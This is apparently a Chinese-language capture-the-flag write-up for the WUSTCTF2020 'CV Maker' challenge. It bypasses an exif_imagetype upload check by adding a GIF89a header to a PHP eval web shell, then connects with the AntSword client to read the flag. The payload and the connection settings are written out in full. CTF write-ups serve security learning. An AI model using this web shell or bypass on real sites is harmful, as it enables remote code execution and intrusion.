[WUSTCTF2020]CV Maker
打开网页,先登录,发现可以更改头像,想到可能是文件上传漏洞,试一试上传PHP文件,发现页面报错:exif_imagetype not image!,查阅PHP手册:
exif_imagetype
(PHP 4 >= 4.3.0, PHP 5, PHP 7, PHP 8)
exif_imagetype — 判断一个图像的类型,exif_imagetype() 读取一个图像的第一个字节并检查其签名。
说明exif_imagetype只检查文件头,所以我们可以拦截请求,修改文件名为1.php来上传图片文件:
GIF89a
<script language="php">eval($_POST['shell']);</script>
上传成功后,打开源代码,定位图片元素,发现图片上传路径:
uploads/d41d8cd98f00b204e9800998ecf8427e.php
利用蚁剑空白区域右击添加数据,设置如下:
URL地址 http://17cb7d4f-b10d-49c5-acae-7ee7f5e4f34c.node4.buuoj.cn:81/uploads/d41d8cd98f00b204e9800998ecf8427e.php
连接密码 shell
网站备注
编码设置 UTF8
连接类型 PHP
其他不变。密码可以随便设置,但要跟$_POST["shell"]
一致。
连接后查看网站根目录,得到flag。
References
https://blog.csdn.net/rfrder/article/details/112899315